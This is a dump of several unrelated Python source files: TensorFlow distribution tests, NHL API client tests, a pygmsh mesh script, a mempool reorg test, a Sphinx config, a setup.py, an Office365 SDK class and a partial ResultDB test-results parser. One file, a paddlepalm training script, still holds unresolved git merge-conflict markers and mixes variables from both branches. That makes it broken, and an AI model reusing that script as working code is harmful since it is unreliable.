mean2 = dist2.mean().eval()
self.assertAllClose(mean2[class_num], 2 * mean1[class_num])
self.assertTupleEqual((3,), mean1.shape)
def testVariance(self):
# Shape [2]
alpha = [1., 2]
ns = [2., 3., 4., 5.]
alpha_0 = np.sum(alpha)
# Diagonal entries are of the form:
# Var(X_i) = n * alpha_i / alpha_sum * (1 - alpha_i / alpha_sum) *
# (alpha_sum + n) / (alpha_sum + 1)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
# Off diagonal entries are of the form:
# Cov(X_i, X_j) = -n * alpha_i * alpha_j / (alpha_sum ** 2) *
# (alpha_sum + n) / (alpha_sum + 1)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [2, 2].
shared_matrix = np.array([
[variance_entry(alpha[0], alpha_0),
covariance_entry(alpha[0], alpha[1], alpha_0)],
[covariance_entry(alpha[1], alpha[0], alpha_0),
variance_entry(alpha[1], alpha_0)]])
with self.test_session():
for n in ns:
# n is shape [] and alpha is shape [2].
dist = tf.contrib.distributions.DirichletMultinomial(n, alpha)
variance = dist.variance()
expected_variance = n * (n + alpha_0) / (1 + alpha_0) * shared_matrix
self.assertEqual((2, 2), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_n_alpha_broadcast(self):
alpha_v = [1., 2, 3]
alpha_0 = 6.
# Shape [4, 3]
alpha = np.array(4 * [alpha_v], dtype=np.float32)
# Shape [4, 1]
ns = np.array([[2.], [3.], [4.], [5.]], dtype=np.float32)
variance_entry = lambda a, a_sum: a / a_sum * (1 - a / a_sum)
covariance_entry = lambda a, b, a_sum: -a * b/ a_sum**2
# Shape [4, 3, 3]
shared_matrix = np.array(4 * [[
[variance_entry(alpha_v[0], alpha_0),
covariance_entry(alpha_v[0], alpha_v[1], alpha_0),
covariance_entry(alpha_v[0], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[1], alpha_v[0], alpha_0),
variance_entry(alpha_v[1], alpha_0),
covariance_entry(alpha_v[1], alpha_v[2], alpha_0)],
[covariance_entry(alpha_v[2], alpha_v[0], alpha_0),
covariance_entry(alpha_v[2], alpha_v[1], alpha_0),
variance_entry(alpha_v[2], alpha_0)]]], dtype=np.float32)
with self.test_session():
# ns is shape [4, 1], and alpha is shape [4, 3].
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
variance = dist.variance()
expected_variance = np.expand_dims(
ns * (ns + alpha_0) / (1 + alpha_0), -1) * shared_matrix
self.assertEqual((4, 3, 3), variance.get_shape())
self.assertAllClose(expected_variance, variance.eval())
def testVariance_multidimensional(self):
alpha = np.random.rand(3, 5, 4).astype(np.float32)
alpha2 = np.random.rand(6, 3, 3).astype(np.float32)
ns = np.random.randint(low=1, high=11, size=[3, 5, 1]).astype(np.float32)
ns2 = np.random.randint(low=1, high=11, size=[6, 1, 1]).astype(np.float32)
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(ns, alpha)
dist2 = tf.contrib.distributions.DirichletMultinomial(ns2, alpha2)
variance = dist.variance()
variance2 = dist2.variance()
self.assertEqual((3, 5, 4, 4), variance.get_shape())
self.assertEqual((6, 3, 3, 3), variance2.get_shape())
def testZeroCountsResultsInPmfEqualToOne(self):
# There is only one way for zero items to be selected, and this happens with
# probability 1.
alpha = [5, 0.5]
counts = [0., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(0., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(1.0, pmf.eval())
self.assertEqual((), pmf.get_shape())
def testLargeTauGivesPreciseProbabilities(self):
# If tau is large, we are doing coin flips with probability mu.
mu = np.array([0.1, 0.1, 0.8], dtype=np.float32)
tau = np.array([100.], dtype=np.float32)
alpha = tau * mu
# One (three sided) coin flip. Prob[coin 3] = 0.8.
# Note that since it was one flip, value of tau didn't matter.
counts = [0., 0, 1]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8, pmf.eval(), atol=1e-4)
self.assertEqual((), pmf.get_shape())
# Two (three sided) coin flips. Prob[coin 3] = 0.8.
counts = [0., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.8**2, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
# Three (three sided) coin flips.
counts = [1., 0, 2]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(3., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(3 * 0.1 * 0.8 * 0.8, pmf.eval(), atol=1e-2)
self.assertEqual((), pmf.get_shape())
def testSmallTauPrefersCorrelatedResults(self):
# If tau is small, then correlation between draws is large, so draws that
# are both of the same class are more likely.
mu = np.array([0.5, 0.5], dtype=np.float32)
tau = np.array([0.1], dtype=np.float32)
alpha = tau * mu
# If there is only one draw, it is still a coin flip, even with small tau.
counts = [1., 0]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(1., alpha)
pmf = dist.pmf(counts)
self.assertAllClose(0.5, pmf.eval())
self.assertEqual((), pmf.get_shape())
# If there are two draws, it is much more likely that they are the same.
counts_same = [2., 0]
counts_different = [1, 1.]
with self.test_session():
dist = tf.contrib.distributions.DirichletMultinomial(2., alpha)
pmf_same = dist.pmf(counts_same)
pmf_different = dist.pmf(counts_different)
self.assertLess(5 * pmf_different.eval(), pmf_same.eval())
self.assertEqual((), pmf_same.get_shape())
def testNonStrictTurnsOffAllChecks(self):
# Make totally invalid input.
with self.test_session():
alpha = [[-1., 2]] # alpha should be positive.
counts = [[1., 0], [0., -1]] # counts should be non-negative.
n = [-5.3] # n should be a non negative integer equal to counts.sum.
dist = tf.contrib.distributions.DirichletMultinomial(
n, alpha, validate_args=False)
dist.pmf(counts).eval() # Should not raise.
if __name__ == '__main__':
tf.test.main()
|
py | 1a3f5ebf71efac13b5a8db27fb1341f2d22c8c0e | from datetime import date
import pytest
from nhlapi.endpoints import NHLAPI
from nhlapi.utils import Season
class MockClient:
def get(self, url, params=None):
self.url = url
self.params = params
def test_teams():
mock = MockClient()
api = NHLAPI(mock)
api.teams(8, expand=["foo", "bar"], stats="single")
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams"
assert mock.params["teamId"] == "8"
assert mock.params["expand"] == "foo,bar"
assert mock.params["stats"] == "single"
def test_teams_stats():
mock = MockClient()
api = NHLAPI(mock)
api.team_stats(8)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/teams/8/stats"
def test_teams_divisions():
mock = MockClient()
api = NHLAPI(mock)
api.divisions()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions"
def test_teams_divisions_id():
mock = MockClient()
api = NHLAPI(mock)
api.divisions(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/divisions/1"
def test_teams_conferences():
mock = MockClient()
api = NHLAPI(mock)
api.conferences()
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences"
def test_teams_conferences_id():
mock = MockClient()
api = NHLAPI(mock)
api.conferences(1)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/conferences/1"
def test_people_simple():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000)
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000"
def test_people_stats():
mock = MockClient()
api = NHLAPI(mock)
api.people(5000, stats="single", stats_season=Season(end=2018))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/people/5000/stats"
assert mock.params["stats"] == "single"
assert mock.params["season"] == "20172018"
def test_schedule_date():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(expand=["foo", "bar"], date=date(2018, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["expand"] == "foo,bar"
assert mock.params["date"] == "2018-01-01"
def test_schedule_team_range():
mock = MockClient()
api = NHLAPI(mock)
api.schedule(8, start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/schedule"
assert mock.params["teamId"] == "8"
assert mock.params["startDate"] == "2018-01-01"
assert mock.params["endDate"] == "2018-06-01"
def test_schedule_bad_args():
mock = MockClient()
api = NHLAPI(mock)
with pytest.raises(ValueError):
api.schedule(date=date.today(), start_date=date(2018, 1, 1), end_date=date(2018, 6, 1))
def test_standings_season():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", season=Season(2017))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["season"] == "20172018"
def test_standings_date():
mock = MockClient()
api = NHLAPI(mock)
api.standings(expand="foo", date=date(2017, 1, 1))
assert mock.url == "https://statsapi.web.nhl.com/api/v1/standings/byLeague"
assert mock.params["expand"] == "foo"
assert mock.params["date"] == "2017-01-01"
def test_standings_bad_args():
mock = MockClient()
api = NHLAPI(mock)
with pytest.raises(ValueError):
api.standings(date=date.today(), season=Season(end=2018))
|
py | 1a3f5ef15827d8b5f9be2376fe533b04efd83bef | import pygmsh as pg
from params import height, width, dist_center, inlet_width, inlet_depth, line_sep, ymin1, ymin2
from params import INMOUTH1, INMOUTH2, OUTMOUTH1, OUTMOUTH2, INLET1, INLET2, OUTLET1, OUTLET2, WALLS, DOMAIN
def main():
#geom = pg.built_in.Geometry()
size = 0.02;
geom = pg.opencascade.Geometry(
characteristic_length_min=size, characteristic_length_max=size)
main_rect = geom.add_rectangle([0.0, 0.0, 0.0], width, height)
mouth_inlet1 = geom.add_rectangle([-inlet_depth, ymin1, 0.0], inlet_depth, inlet_width)
mouth_inlet2 = geom.add_rectangle([-inlet_depth, ymin2, 0.0], inlet_depth, inlet_width)
mouth_outlet1 = geom.add_rectangle([width, ymin1, 0.0], inlet_depth, inlet_width)
mouth_outlet2 = geom.add_rectangle([width, ymin2, 0.0], inlet_depth, inlet_width)
print("ymin1 :{}".format(ymin1))
print("ymin2 :{}".format(ymin2))
geom.add_physical(mouth_inlet1, INMOUTH1)
geom.add_physical(mouth_inlet2, INMOUTH2)
geom.add_physical(mouth_outlet1, OUTMOUTH1)
geom.add_physical(mouth_outlet2, OUTMOUTH2)
geom.add_physical([main_rect], DOMAIN)
heat_exchanger = geom.boolean_fragments([main_rect], [mouth_inlet1, mouth_inlet2, mouth_outlet1, mouth_outlet2])
geom.add_raw_code("""vb1[] = Boundary{{Surface{{ {0} }};}};
vb2[] = Boundary{{Surface{{ {1} }};}};
vb3[] = Boundary{{Surface{{ {2} }};}};
vb4[] = Boundary{{Surface{{ {3} }};}};
vb0[] = Boundary{{Surface{{ {4} }};}};"""
.format(mouth_inlet1.id,
mouth_inlet2.id,
mouth_outlet1.id,
mouth_outlet2.id,
main_rect.id
))
geom.add_raw_code("""Physical Curve({0}) = {{vb0[],
vb1[0], vb1[2],
vb2[0], vb2[2],
vb3[0], vb3[2],
vb4[0], vb4[2]}};"""
.format(WALLS)
)
geom.add_raw_code("Physical Curve({0}) -= {{-vb1[1], -vb2[1], -vb3[3], -vb4[3]}};\n \
Physical Curve({1}) = {{vb1[3]}};\n \
Physical Curve({2}) = {{vb3[1]}};\n \
Physical Curve({3}) = {{vb2[3]}};\n \
Physical Curve({4}) = {{vb4[1]}};"
.format(WALLS, INLET1, OUTLET1, INLET2, OUTLET2))
mesh = pg.generate_mesh(geom, geo_filename="2D_mesh.geo")
import meshio
meshio.write("2D_mesh_heat_exchanger.vtk", mesh)
if __name__ == '__main__':
main()
|
py | 1a3f5f8dd79ee781d36173aed4b460ad09f672be | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework.test_framework import FatbitTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolCoinbaseTest(FatbitTestFramework):
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def create_tx(self, from_txid, to_address, amount):
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
signresult = self.nodes[0].signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
py | 1a3f5fcac8a7a7164338494fdabdbf7924227d74 | # flake8: noqa
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import datetime
import os
import re
import sys
catalyst_root_path = "../"
sys.path.insert(0, os.path.abspath(catalyst_root_path))
# -- Project information -----------------------------------------------------
project = "Catalyst"
copyright = "{}, Scitator".format(datetime.datetime.now().year)
author = "Sergey Kolesnikov"
docs_repo = "catalyst"
docs_user = "catalyst-team"
releases_github_path = "catalyst-team/catalyst"
def get_version(mode: str = "full") -> str:
"""
@TODO: Docs. Contribution is welcome
"""
current_dir = os.path.abspath(os.path.dirname(__file__))
root = os.path.dirname(current_dir)
version_file = os.path.join(root, "catalyst", "__version__.py")
if not os.path.exists(version_file):
version_file = os.path.join(root, "__version__.py")
version_ = "1.0"
try:
with open(version_file) as f:
version_ = re.search(
r'^__version__ = [\'"]([^\'"]*)[\'"]', f.read(), re.M
).group(1)
except Exception:
pass
if mode == "short":
try:
version_ = re.search(r"^(\d+\.\d+)", version_, re.M).group(1)
except Exception:
pass
return version_
# The short X.Y version
version = get_version("short")
# The full version, including alpha/beta/rc tags
release = get_version("full")
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = "1.0"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named "sphinx.ext.*") or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
# "releases",
]
autodoc_inherit_docstrings = False
napoleon_google_docstring = True
napoleon_include_init_with_doc = True
napoleon_numpy_docstring = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = [".rst", ".md"]
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# Ignoring Third-party packages
autodoc_mock_imports = [
"alchemy",
"neptune",
"wandb",
"gym",
"gridfs",
"pymongo",
"redis",
]
# autodoc_default_flags = [
# "members", "undoc-members", "private-members",
# "special-members", "inherited-members", "show-inheritance"
# ]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "catalyst_sphinx_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {}
# html_theme_options = {
# "display_version": True,
# "prev_next_buttons_location": "bottom",
# "collapse_navigation": False,
# "sticky_navigation": True,
# "navigation_depth": 4,
# }
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
html_short_title = "Catalyst DL R&D"
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don"t match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``["localtoc.html", "relations.html", "sourcelink.html",
# "searchbox.html"]``.
#
# html_sidebars = {}
html_context = {
"display_github": True,
"source_url_prefix": (
f"https://github.com/{docs_user}/{docs_repo}/tree/master/docs"
),
"github_host": "github.com",
"github_user": docs_user,
"github_repo": docs_repo,
"github_version": "master",
"conf_py_path": "/docs/",
"source_suffix": ".rst",
}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "Catalystdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ("letterpaper" or "a4paper").
#
# "papersize": "letterpaper",
# The font size ("10pt", "11pt" or "12pt").
#
# "pointsize": "10pt",
# Additional stuff for the LaTeX preamble.
#
# "preamble": "",
# Latex figure (float) alignment
#
# "figure_align": "htbp",
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"Catalyst.tex",
"Catalyst Documentation",
"Scitator",
"manual",
),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "catalyst", "Catalyst Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"Catalyst",
"Catalyst Documentation",
author,
"Catalyst",
"One line description of project.",
"Miscellaneous",
),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ""
# A unique identification for the text.
#
# epub_uid = ""
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# -- Extension configuration -------------------------------------------------
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
|
py | 1a3f6049f0f14056397374f8d92f3e0caf2609e7 | # coding=utf-8
import paddlepalm as palm
import json
if __name__ == '__main__':
max_seqlen = 512
batch_size = 4
num_epochs = 2
lr = 1e-3
vocab_path = './pretrain/ernie/vocab.txt'
train_file = './data/cls4mrqa/train.tsv'
predict_file = './data/cls4mrqa/dev.tsv'
config = json.load(open('./pretrain/ernie/ernie_config.json'))
# ernie = palm.backbone.ERNIE(...)
ernie = palm.backbone.ERNIE.from_config(config)
# cls_reader2 = palm.reader.cls(train_file_topic, vocab_path, batch_size, max_seqlen)
# cls_reader3 = palm.reader.cls(train_file_subj, vocab_path, batch_size, max_seqlen)
# topic_trainer = palm.Trainer('topic_cls', cls_reader2, cls)
# subj_trainer = palm.Trainer('subj_cls', cls_reader3, cls)
# 创建该分类任务的reader,由诸多参数控制数据集读入格式、文件数量、预处理规则等
cls_reader = palm.reader.ClassifyReader(vocab_path, max_seqlen)
<<<<<<< HEAD:test/test2/run.py
cls_reader2 = palm.reader.ClassifyReader(vocab_path, max_seqlen)
=======
predict_cls_reader = palm.reader.ClassifyReader(vocab_path, max_seqlen, phase='predict')
>>>>>>> remotes/upstream/r0.3-api:test/test3/run.py
print(cls_reader.outputs_attr)
print(predict_cls_reader.outputs_attr)
# 不同的backbone会对任务reader有不同的特征要求,例如对于分类任务,基本的输入feature为token_ids和label_ids,但是对于BERT,还要求从输入中额外提取position、segment、input_mask等特征,因此经过register后,reader会自动补充backbone所要求的字段
cls_reader.register_with(ernie)
cls_reader2.register_with(ernie)
print(cls_reader.outputs_attr)
<<<<<<< HEAD:test/test2/run.py
print("preparing data...")
print(cls_reader.num_examples)
cls_reader.load_data(train_file, batch_size)
cls_reader2.load_data(train_file, batch_size)
=======
print(predict_cls_reader.outputs_attr)
print("preparing data...")
print(cls_reader.num_examples)
cls_reader.load_data(train_file, batch_size, num_epochs=num_epochs)
>>>>>>> remotes/upstream/r0.3-api:test/test3/run.py
print(cls_reader.num_examples)
print('done!')
# 创建任务头(task head),如分类、匹配、机器阅读理解等。每个任务头有跟该任务相关的必选/可选参数。注意,任务头与reader是解耦合的,只要任务头依赖的数据集侧的字段能被reader提供,那么就是合法的
cls_head = palm.head.Classify(4, 1024, 0.1)
<<<<<<< HEAD:test/test2/run.py
cls_head2 = palm.head.Classify(4, 1024, 0.1)
# 根据reader和任务头来创建一个训练器trainer,trainer代表了一个训练任务,内部维护着训练进程、和任务的关键信息,并完成合法性校验,该任务的模型保存、载入等相关规则控制
trainer = palm.Trainer('cls')
trainer2 = palm.Trainer('senti_cls')
mh_trainer = palm.MultiHeadTrainer([trainer, trainer2])
=======
# 根据reader和任务头来创建一个训练器trainer,trainer代表了一个训练任务,内部维护着训练进程、和任务的关键信息,并完成合法性校验,该任务的模型保存、载入等相关规则控制
trainer = palm.Trainer('senti_cls')
>>>>>>> remotes/upstream/r0.3-api:test/test3/run.py
# match4mrqa.reuse_head_with(mrc4mrqa)
# data_vars = cls_reader.build()
# output_vars = ernie.build(data_vars)
# cls_head.build({'backbone': output_vars, 'reader': data_vars})
<<<<<<< HEAD:test/test2/run.py
loss_var = mh_trainer.build_forward(ernie, [cls_head, cls_head2])
n_steps = cls_reader.num_examples * num_epochs // batch_size
warmup_steps = int(0.1 * n_steps)
print(warmup_steps)
sched = palm.lr_sched.TriangularSchedualer(warmup_steps, n_steps)
=======
loss_var = trainer.build_forward(ernie, cls_head)
# controller.build_forward()
# Error! a head/backbone can be only build once! Try NOT to call build_forward method for any Trainer!
# n_steps = cls_reader.num_examples * num_epochs // batch_size
# warmup_steps = int(0.1 * n_steps)
# print(warmup_steps)
# sched = palm.lr_sched.TriangularSchedualer(warmup_steps, n_steps)
sched = None
>>>>>>> remotes/upstream/r0.3-api:test/test3/run.py
adam = palm.optimizer.Adam(loss_var, lr, sched)
mh_trainer.build_backward(optimizer=adam, weight_decay=0.001)
# mh_trainer.random_init_params()
mh_trainer.load_pretrain('pretrain/ernie/params')
# trainer.train(iterator_fn, print_steps=1, save_steps=5, save_path='outputs', save_type='ckpt,predict')
<<<<<<< HEAD:test/test2/run.py
mh_trainer.fit_readers_with_mixratio([cls_reader, cls_reader2], 'cls', 2)
mh_trainer.train(print_steps=1)
# trainer.save()
=======
trainer.fit_reader(cls_reader)
trainer.train(print_steps=1)
# trainer.save()
print('prepare to predict...')
pred_ernie = palm.backbone.ERNIE.from_config(config, phase='pred')
cls_pred_head = palm.head.Classify(4, 1024, phase='pred')
trainer.build_predict_forward(pred_ernie, cls_pred_head)
predict_cls_reader.load_data(predict_file, 8)
print(predict_cls_reader.num_examples)
predict_cls_reader.register_with(pred_ernie)
trainer.fit_reader(predict_cls_reader, phase='predict')
print('predicting..')
trainer.predict(print_steps=20)
# controller = palm.Controller([mrqa, match4mrqa, mlm4mrqa])
# loss = controller.build_forward(bb, mask_task=[])
# n_steps = controller.estimate_train_steps(basetask=mrqa, num_epochs=2, batch_size=8, dev_count=4)
# adam = palm.optimizer.Adam(loss)
# sched = palm.schedualer.LinearWarmup(learning_rate, max_train_steps=n_steps, warmup_steps=0.1*n_steps)
#
# controller.build_backward(optimizer=adam, schedualer=sched, weight_decay=0.001, use_ema=True, ema_decay=0.999)
# controller.random_init_params()
# controller.load_pretrain('../../pretrain_model/ernie/params')
# controller.train()
# controller = palm.Controller(config='config.yaml', task_dir='tasks', for_train=False)
# controller.pred('mrqa', inference_model_dir='output_model/secondrun/mrqa/infer_model')
>>>>>>> remotes/upstream/r0.3-api:test/test3/run.py
|
py | 1a3f60672243893de1a93f2d81a10224abd387a3 | from setuptools import setup, find_packages
setup(
name='pf-python-communication',
version='1.0',
url='https://github.com/problemfighter/pf-python-communication',
license='Apache 2.0',
author='Touhid Mia',
author_email='[email protected]',
description='Problem Fighter Python Communication helper, such as Websocket, Email, push notification etc',
long_description=__doc__,
packages=find_packages(),
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
"flask-socketio"
],
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache 2.0 License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
) |
py | 1a3f6074b7bbca6bc04fbae383572fcdb2f689f1 | from office365.directory.identities.userflows.b2x_identity_user_flow import B2XIdentityUserFlow
from office365.directory.identities.identity_provider_base import IdentityProviderBase
from office365.entity import Entity
from office365.entity_collection import EntityCollection
from office365.runtime.resource_path import ResourcePath
class IdentityContainer(Entity):
@property
def identity_providers(self):
return self.properties.get('identityProviders',
EntityCollection(self.context, IdentityProviderBase,
ResourcePath("identityProviders", self.resource_path)))
@property
def b2x_user_flows(self):
return self.properties.get('b2xUserFlows',
EntityCollection(self.context, B2XIdentityUserFlow,
ResourcePath("b2xUserFlows", self.resource_path)))
|
py | 1a3f613ed41900ad3d85011a2532bb8f8ae7082e | # Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module is for processing test results from resultdb"""
import base64
import logging
from collections import defaultdict
from common.findit_http_client import FinditHttpClient
from go.chromium.org.luci.resultdb.proto.v1 import test_result_pb2
from infra_api_clients import http_client_util
from libs.test_results.base_test_results import BaseTestResults
from libs.test_results.classified_test_results import ClassifiedTestResults
from services import resultdb
_FAILURE_STATUSES = [
test_result_pb2.TestStatus.FAIL, test_result_pb2.TestStatus.CRASH,
test_result_pb2.TestStatus.ABORT
]
_FINDIT_HTTP_CLIENT = FinditHttpClient()
class ResultDBTestType(object):
OTHER = 'OTHER'
GTEST = 'GTEST'
BLINK = 'BLINK'
# TODO (crbug/981066): Implement this
# pylint: disable=abstract-method
class ResultDBTestResults(BaseTestResults):
def __init__(self, test_results, partial_result=False):
"""Creates a ResultDBTestResults object from resultdb test results
Arguments:
test_results: Array of luci.resultdb.v1.TestResult object
partial_result: False if the results are from a single shard, True if
the results are from all shards
"""
self.partial_result = partial_result
self.test_results = ResultDBTestResults.group_test_results_by_test_name(
test_results)
def GetFailedTestsInformation(self):
failed_test_log = {}
reliable_failed_tests = {}
for test_name, result in self.test_results.items():
if result["reliable_failure"]:
test_type = result["test_type"]
# TODO(crbug.com/981066): Consider running this in parallel
real_logs = map(
lambda l: ResultDBTestResults.get_detailed_failure_log(
test_type, l), result["failure_logs"])
merged_test_log = '\n'.join(real_logs)
failed_test_log[test_name] = base64.b64encode(merged_test_log)
reliable_failed_tests[test_name] = test_name
return failed_test_log, reliable_failed_tests
@property
def contains_all_tests(self):
"""
True if the test result is merged results for all shards; False if it's a
partial result.
"""
return not self.partial_result
def test_type(self):
for _, result in self.test_results.items():
return result["test_type"]
return ResultDBTestType.OTHER
def GetClassifiedTestResults(self):
"""Parses ResultDB results, counts and classifies test results.
Also counts number of expected and unexpected results for each test.
Returns:
(ClassifiedTestResults) An object with information for each test:
* total_run: total number of runs,
* num_expected_results: total number of runs with expected results,
* num_unexpected_results: total number of runs with unexpected results,
* results: classified test results in 5 groups: passes, failures, skips,
unknowns, notruns.
"""
classified_results = ClassifiedTestResults()
for test_name, test_info in self.test_results.items():
# We don't care about the tests that were skipped on purpose
if (test_info["num_passed"] == 0 and test_info["num_failed"] == 0 and
test_info["num_crashed"] == 0 and test_info["num_aborted"] == 0 and
test_info["num_notrun"] == 0 and test_info["num_unspecified"] == 0):
continue
classified_results[test_name].total_run = test_info["total_run"]
classified_results[test_name].num_expected_results = test_info[
"num_expected_results"]
classified_results[test_name].num_unexpected_results = test_info[
"num_unexpected_results"]
if test_info["num_passed"]:
classified_results[test_name].results.passes['PASS'] = test_info[
"num_passed"]
if test_info["num_failed"]:
classified_results[test_name].results.failures['FAIL'] = test_info[
"num_failed"]
if test_info["num_crashed"]:
classified_results[test_name].results.failures['CRASH'] = test_info[
"num_crashed"]
if test_info["num_aborted"]:
classified_results[test_name].results.failures['ABORT'] = test_info[
"num_aborted"]
if test_info["num_skipped"]:
